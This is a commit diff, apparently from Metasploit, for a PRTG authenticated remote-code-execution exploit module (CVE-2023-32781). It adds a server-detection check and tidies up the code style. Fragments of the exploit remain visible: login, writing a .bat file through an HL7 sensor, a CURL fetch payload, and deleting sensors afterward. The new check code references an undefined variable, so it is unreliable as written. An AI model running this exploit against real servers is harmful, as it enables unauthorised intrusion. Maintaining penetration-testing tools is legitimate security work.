Fixed check module function

rapid7 · Dec 29, 2023 · 3b8f684 · 3b8f684
1 parent 2f023f7
commit 3b8f684
Showing 1 changed file with 28 additions and 13 deletions.
diff --git a/modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb b/modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb
@@ -27,7 +27,7 @@ def initialize(info = {})
             {
               'Arch' => [ ARCH_CMD ],
               'Platform' => 'win',
-              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL'},
+              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
               'Type' => :win_fetch
             }
           ],
@@ -43,8 +43,7 @@ def initialize(info = {})
         ],
         'DefaultTarget' => 0,
 
-        'DefaultOptions' => {
-        },
+        'DefaultOptions' => {},
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -72,7 +71,26 @@ def initialize(info = {})
   end
 
   def check
-    CheckCode::Vulnerable
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(datastore['URI'], '/index.htm')
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    ensure
+      disconnect
+    end
+
+    if res && res.code == 200
+      prtg_server_header = res.headers['Server']
+
+      if (prtg_server_header.include? 'PRTG') || (html.to_s.include? 'PRTG')
+        return CheckCode::Detected
+      end
+    end
+
+    return CheckCode::Unknown
   end
 
   def exploit
@@ -89,13 +107,10 @@ def exploit
 
   def on_new_session(client)
     super
-    @sensors_to_delete.each {|sensor_id|
+    @sensors_to_delete.each do |sensor_id|
       delete_sensor_by_id(sensor_id)
-    }
-    print_good("Session created")
-  end
-
-
+    end
+    print_good('Session created')
   end
 
   def execute_command(cmd, _opts = {})
@@ -108,7 +123,7 @@ def execute_command(cmd, _opts = {})
   end
 
   def authenticate_prtg
-    print_status("Authenticating against PRTG")
+    print_status('Authenticating against PRTG')
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'public', 'checklogin.htm'),
@@ -160,7 +175,7 @@ def delete_sensor_by_id(sensor_id)
       },
       'vars_post' => {
         id: sensor_id,
-        approve: 1,
+        approve: 1
       }
     })
 
@@ -280,7 +295,7 @@ def write_bat_file_to_disk(cmd)
     print_status('Requesting HL7 Sensor to initiate scan')
 
     run_sensor_with_id(sensor_id)
-    $sensors_to_delete.push(sensor_id)
+    @sensors_to_delete.push(sensor_id)
 
     print_good('.bat file written to disk')
     bat_file_name